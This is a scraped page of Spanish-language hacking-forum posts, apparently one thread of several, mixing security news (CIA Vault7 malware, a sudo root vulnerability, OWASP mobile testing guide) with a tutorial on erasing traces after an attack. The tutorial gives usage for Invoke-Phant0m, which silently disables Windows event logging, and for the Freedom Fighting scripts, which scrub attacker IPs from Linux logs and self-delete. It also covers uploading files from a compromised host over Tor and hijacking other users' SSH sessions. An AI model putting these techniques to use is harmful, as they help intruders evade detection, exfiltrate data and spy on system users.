Aquí tienes un proyecto con repo en Github hecho en Javascript: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Y aquí un tutorial del autor de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, comentando como realizar algo similar: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

No.

Como parte del programa Vault7, que revela información secreta sobre el ciberespionaje global de la CIA, el portal You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Loginha publicado este primero de junio varios documentos referentes a otro otro proyecto de la inteligencia estadounidense denominado You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, activo por lo menos hasta 2015.

Pandemic funciona bajo el sistema operativo Windows e instala un implante persistente en cualquier sistema que esté compartiendo archivos en una red local.

Para ello, el programa malicioso reemplaza temporalmente y on-the-fly el archivo al cual está accediendo el usuario e instala un troyano que permite acceder a información confidencial.

Para ofuscar su actividad, el archivo original en el servidor permanece sin cambios; sólo se modifica o reemplaza mientras está en tránsito desde el servidor de archivos y antes de ser ejecutado en el equipo del usuario remoto. El implante permite la sustitución de hasta 20 programas con un tamaño máximo de 800 MB para una lista seleccionada de usuarios remotos (objetivos).

Como su nombre sugiere, un solo ordenador en una red local con unidades compartidas infectadas con el implante "Pandémico" actuará como el "Paciente Cero" en la propagación de una enfermedad e infectará las computadoras remotas. Aunque no se indica explícitamente en los documentos publicados, parece técnicamente factible que los equipos remotos que proporcionan archivos compartidos se conviertan en nuevos servidores de archivos pandémicos en la red local para alcanzar nuevos objetivos.


Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Como te comentaron, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login es de las soluciones empresariales más usadas. Te dejo también este You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login por si lo prefieres.

El análisis forense es uno de esos campos que es tan importante como la defensa. Alguien dijo que hay dos tipos de empresas: aquellas que han sido comprometidas y aquellas que aún no saben que han sido comprometidas. Muchos expertos también recomiendan, sin dejar de lado una buena defensa, tener una buena estrategia de recuperación, porque no hay que preguntarse si vamos a ser comprometidos, sino cuando, y cuando esto ocurra ¿Cuál es tu plan? Por supuesto saber cómo hemos sido comprometidos es un requisito inamovible.


La importancia de mantener nuestras habilidades y conocimientos al día es crucial. Por supuesto nada como enfrentarnos a escenarios reales, pero si no tienes la oportunidad de hacerlo, deberías al menos practicar con imgágenes preparadas para competiciones tipo CTF, etc.

En la web de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login mantienen un buena You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login con las que puedes prácticar de forma segura.


Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hasta el día de hoy, no existe un estándar ampliamente aceptado para la seguridad de las aplicaciones para móviles. El objetivo del You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login es solucionar esta situación. El objetivo es liberar la guía en forma de libro electrónico gratuito y potencialmente un libro impreso para finales de este año.

Además de un estándar de seguridad para aplicaciones móviles, el grupo de trabajo dirigido por You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login están produciendo una guía de pruebas exhaustivas que cubren los procesos, técnicas y herramientas utilizados durante una prueba de seguridad de aplicaciones para móviles, así como un conjunto de casos de prueba que permite a los analistas ofrecer resultados con información coherente y completa.

El objetivo inicial es completar un primer borrador de la Mobile Security Testing Guide (MSTG) y las tareas incluyen:

    - Escribir el contenido original, los procesos de prueba y los casos de prueba.
    - Revisión y edición técnica para mejorar la calidad general del MSTG.


Capítulos asociados en el MSTG:

General / OS-independent

    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Android

    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


iOS

    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Associated chapters in the MSTG

    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



El estado actual de la guía está muy avanzando y sirve de consulta pero You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login a los grupos de trabajo organizados en torno a los principales temas tratados en la guía.



Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


PD: podeis encontrar el repositorio con todo el contenido You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Muy buena la info @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login!
Es muy útil.

No hay problema en que el post sea extenso, te animo a que añadas lo demás si te apetece.

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, muy probablemente este desfasado.

Red Hat, Debian, Ubuntu, SUSE y otras distribuciones de Linux lanzaron parches para una vulnerabilidad de severidad alta en "sudo", la cualpodría ser abusada por un atacante local para obtener privilegios de root. Se ven afectadas las versiones de sudo 1.8.6p7 a 1.8.20. Los usuarios deben actualizar a sudo 1.8.20p1.

Sudo es un comando de sistemas *NIX que permite a los usuarios estándar ejecutar comandos específicos con permisos de superusuario, como agregar usuarios o realizar actualizaciones del sistema.

En este caso, los investigadores de Qualys encontraron una vulnerabilidad (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) en la función get_process_ttyname() de sudo que permite a un atacante local con privilegios de sudoer ejecutar comandos como root o elevar sus privilegios.

LaYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login dice que SELinux debe estar habilitado y sudo compilado con el soporte de SELinux para que la vulnerabilidad se active. "En un sistema con SELinux habilitado, si un usuario es Sudoer para un comando sobre el cual no tiene privilegios completos de root, puede sobrescribir cualquier archivo del sistema de archivos con la ejecución de un comando" dijeron los investigadores de Qualys.

Este problema, si se explota, permite al atacante eludir los controles y hacer más de lo que se supone que debería hacer. El atacante ya debe estar delante del mismo sistema y tener acceso a la consola.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para Red Hat Enterprise Linux 6, Red Hat Enterprise Linux Server y Red Hat Enterprise Linux 7. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login Wheezy, Jessie y Sid. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login todos sus productos.

Qualys dijo que publicará el exploit una vez que todos los sistemas hayan tenido tiempo de parchear.


Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

En principio ninguna.

Aquí tienes la guía oficial de Tails para desinstalar según sus recomendaciones.

Url: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Su página oficial esta caída, según su twitter están teniendo problemas con el server. Su web es You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¿Pudes explicar que es lo que haces para capturar el tráfico, los pasos que mencionas?

Aquí tienes las novedades que incluye:

Enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, no exactamente, creo que el comando clearev únicamente borra los registros, Invoke-Phant0m para el servicio que se encarga de recoger registros del sistema, dejando el proceso principal activo.

No entiendo tu pregunta. Si describes mejor tu problema más gente podrá ayudarte.

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login no lo he probado, pero estaría interesante hacerlo. Si saco un rato lo compruebo, si te animas y lo haces tu antes podrías dejar un comentario y ampliamos el post.

En esta guía oficial de GNU explican cómo usar sus licencias bastante bien.

Enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Aquí una lista de la misma web que explica los diferentes tipos de licencia.

Enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Y un articulo que explica las licencias OpenSource y Software Libre.

Enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Cuando se realiza un ataque informático que puede tener consecuencias legales o de otro tipo, uno de los puntos claves en los que se suele cometer un error, es en no limpiar bien nuestro rastro. En este post explicaré el funcionamiento de un conjunto de scripts que nos ayudarán a automatizar parte del proceso.

Como existen diversos entornos, utilizaremos Freedom Fighting, una suite de scripts, para sistemas Linux. Para Windows, usaremos Invoke-Phant0m, un script escrito en PowerShell.

---

---

Invoke-Phant0m:

Se trata de un script en PowerShell dirigido al servicio de Registro de Sucesos de Windows (svchost.exe) debido a que es el principal proceso del que se puede obtener información de un atacante en un sistema de este tipo.
El proceso svchost es indispensable en la ejecución de los procesos de servicios compartidos, donde varios servicios comparten procesos con el fin de reducir el uso de recursos del sistema. Esto puede suponer un problema complejo de seguridad al diseñar el sistema operativo.

Podemos obtener Invoke-Phant0m de su repositorio Github: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Los procesos que lleva a cabo Invoke-Phant0m son los siguientes:

   
• Detecta el proceso del servicio de registro de sucesos de Windows en el sistema operativo de destino.
• Obtiene la lista de subprocesos e identifica los ID del subproceso del servicio de registro de sucesos de Windows.
• Elimina todos los subprocesos sobre el servicio de registro de sucesos de Windows.

Es decir, si se ejecuta correctamente, el Servicio Registro de Sucesos de Windows dejará de funcionar, por lo que el sistema de destino no será capaz de recopilar ni enviar los registros, pero aparecerá en ejecución aunque no este activo porque no se ha detenido el proceso svchost.exe para el Servicio de Registro de Sucesos de Windows, pero si los subprocesos relacionados. Esta es la principal ventaja y el propósito de Phant0m's. El servicio se detiene, pero todo parece estar funcionando.


Para usarlo unicamente debemos ejecutar el script, tras importar el módulo.
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Más info: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Video de uso:

---

---

Freedom Fighting:

Se trata de un set con diversas funciones que pueden ser necesarias en la explotación de un sistema cuando no se quiere dejar rastro. Consta de tres scripts de los que explicaremos su uso y funcionamiento:

   
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Para descargarlo, clonamos su repositorio Github:

git clone https://github.com/JusticeRage/freedomfighting.git

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login:

Este script se encarga de eliminar los logs incriminatorios de las carpetas:

   
• /var/run/utmp, /var/log/wtmp, /var/log/btmp
• /var/log/lastlog
• /var/**/*.log
• Cualquier carpeta indicada por el usuario

Las entradas se eliminan en función de una dirección IP y/o del nombre de host asociado. Una característica útil del script, es que permite que los registros continúen escribiéndose después de haber sido manipulados, eliminando así la sospecha de que cualquier fichero de log haya sido modificado. Todo el trabajo se lleva a cabo en una unidad tmpfs y los archivos creados se limpian con seguridad.

Con el comando /nojail.py --help obtenemos los parámetros que le podemos pasar. Como podeís observar, el uso es bastante sencillo.

usage: nojail.py [-h] [--user USER] [--ip IP] [--hostname HOSTNAME]
                    [--verbose] [--check]
                    [log_files [log_files ...]]

   Stealthy log file cleaner.

   positional arguments:
     log_files             Specify any log files to clean in addition to
                           /var/**/*.log.

   optional arguments:
     -h, --help            show this help message and exit
     --user USER, -u USER  The username to remove from the connexion logs.
     --ip IP, -i IP        The IP address to remove from the logs.
     --hostname HOSTNAME   The hostname of the user to wipe. Defaults to the rDNS
                           of the IP.
     --verbose, -v         Print debug messages.
     --check, -c           If present, the user will be asked to confirm each
                           deletion from the logs.
     --daemonize, -d       Start in the background and delete logs when the
                           current session terminates. Implies --self-delete.
     --self-delete, -s     Automatically delete the script after its execution.

Por defecto, si no se proporcionan argumentos, el script intentará determinar la dirección IP basada en la variable de entorno SSH_CONNECTION. Cualquier entrada que coincida con el DNS inverso de ese IP también se eliminará.

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login:

En ocasiones, se necesita subir un archivo de una máquina comprometida a un host o un servicio de terceros. Esto puede poner en peligro nuestro anonimato y además, pocos servicios permiten la subida de archivos desde la consola, o lo hacen de forma complicada. Para ello se ha creado este script, que se encarga de encriptar los archivos en AES-256-CBC simétrico y utilizar torify antes de subirlos.
Únicamente utiliza las librerias openssl y curl o wget.


Ejemplo de uso:

root@proxy:~# ./share.sh ~/file_to_share "My_Secure_Encryption_Key!"
Success! Retrieval command: ./share.sh -r file_to_share "My_Secure_Encryption_Key!" https://transfer.sh/BQPFz/28239
root@proxy:~# ./share.sh -r file_to_share "My_Secure_Encryption_Key!" https://transfer.sh/BQPFz/28239
File retrieved successfully!

Se pueden pasar argumentos adicionales que permiten controlar el número máximo de descargas permitido para el archivo (-m) y cuántos días You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login lo mantendrá (-d). El valor predeterminado para ambas opciones es 1. Es recomendable no usar espacios en la key, ya que es posible que solo reconozca la primera palabra.

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login:

El script utiliza el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para recaudar datos de cualquier sesion creada a traves de SSH. Funciona auditando conexiones exitosas en el fichero auth.log calcula el PID del proceso bash del usuario y deja el resto a shelljack.

Para usarlo solo tienes que lanzarlo en una terminal y esperar a que otros usuarios inicien sesion. Los datos de sus sesiones se guradarán en  /root/.local/sj.log.[user].[timestamp]

---

---

---

Espero que os sea útil. Un saludo, HATI 

WikiLeaks publicó un nuevo lote de información de la CIA, detallando dos aparentes frameworks de malware desarrollados por la "Compañia"y para la plataforma Microsoft Windows. Este lote es el octavo lanzamiento de la serie Vault 7.


AfterMidnight

Apodado "You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login" y "Assassin", ambos programas de malware están diseñados para supervisar y reportar acciones en un equipo  remoto infectado y ejecutar acciones malintencionadas especificadas por la CIA.


Según WikiLeaks, AfterMidnight permite a sus operadores ejecutar malware en un sistema remoto. El controlador principal se disfrazada como un archivo dinámico de Windows (DLL) y ejecuta "Gremlins", que son pequeños payload que permanecen ocultos y prestan diversos "servicios" a otros Gremlins.

Una vez instalado en una máquina, AfterMidnight utiliza un sistema llamado "Octupus" HTTPS-based Listening Post (LP) para comprobar si hay eventos programados. Si se encuentra uno, el malware descarga y almacena todos los componentes necesarios y los nuevos Gremlins en memoria.

De acuerdo con laYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, el almacenamiento local relacionado con AfterMidnight se cifra con una clave que no se almacena en la máquina destino. Un payload especial, llamado "AlphaGremlin", contiene un lenguaje de script personalizado que permite a los operadores programar tareas personalizadas para ejecutar en el sistema infectado.


Assassin

Assassin es similar a AfterMidnight y se describe como "un implante automatizado que proporciona una plataforma de recolección de información en equipos remotos que se ejecuta el sistema operativo Microsoft Windows".

Una vez instalado, esta herramienta ejecuta un implante dentro de un proceso de servicio de Windows, permitiendo a los operadores realizar tareas maliciosas en la máquina infectada.

Assassin consta de cuatro subsistemas: Builder, Implant, Command & Control, y ListeningPost (LP).

El "Implante" proporciona la lógica y la funcionalidad básicas de esta herramienta en una máquina Windows víctima, incluidas las comunicaciones y la ejecución de tareas. Se configura mediante el Builder y se despliega en un equipo de destino a través de algún vector no definido.

El "Builder" permite configurar el Implante antes de la implementación y proporciona una interfaz de línea de comandos personalizada para establecer su configuración.

El subsistema "Comando & Control" actúa como una interfaz entre el operador y el Listening Post (LP), mientras que este LP permite al Implante comunicarse con el subsistema de comando y control a través de un servidor web.


Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Depende a veces del "ruido" y alcance que puedas hacer. Algunas de las imprescindibles para mi.

   - Revisar a mano usando tus conocimientos e intuición
   - Google Hacking
   - BurpSuite
   - SQLmap (si es necesario)
   - Nikto
   - Dependiendo de si utiliza CMS puedes ayudarte de CMSmap, WPScan...
   - Nmap
   - Recon-ng para buscar subdominios y algo de ossint
   - Dirb / DirBuster



Seguro que alguna de las básicas me dejo.